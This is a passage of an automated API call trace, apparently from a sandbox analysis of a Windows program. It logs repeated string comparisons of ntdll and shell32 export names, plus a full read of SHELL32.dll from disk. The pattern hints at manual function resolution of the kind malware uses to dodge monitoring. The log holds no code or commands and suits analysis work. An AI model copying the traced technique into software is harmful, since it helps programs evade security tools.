(lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0141.773] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0141.773] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0141.773] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0141.773] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.773] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.773] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0141.774] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0145.375] GetProcessHeap () returned 0x520000 [0145.375] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x412a040 | out: hHeap=0x520000) returned 1 [0145.390] GetProcessHeap () returned 0x520000 [0145.390] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539720 [0145.390] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0145.390] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0145.390] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0145.390] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0145.391] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0145.391] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0145.391] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0145.391] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0145.391] GetProcessHeap () returned 0x520000 [0145.391] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1587258) returned 0x412d040 [0145.557] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0145.557] ReadFile (in: hFile=0x140, lpBuffer=0x412d040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x412d040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0149.013] CloseHandle (hObject=0x140) returned 1 [0149.014] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0149.014] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0149.014] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0149.015] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0149.015] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0149.015] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0149.015] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0149.015] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0149.015] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.015] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0149.015] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0149.015] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0149.015] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.015] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0149.015] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0149.015] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0149.015] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0149.015] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.015] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0149.016] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.016] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0149.016] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0149.016] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0149.016] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.016] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0149.016] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0149.016] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.016] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0149.016] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0149.016] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0149.016] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0149.016] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.016] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0149.016] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.016] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.016] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0149.017] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.017] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0149.018] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.018] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.019] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.020] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0149.020] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0149.020] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0149.020] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0149.020] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0149.021] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0149.022] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0149.023] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0149.023] lstrcmpA 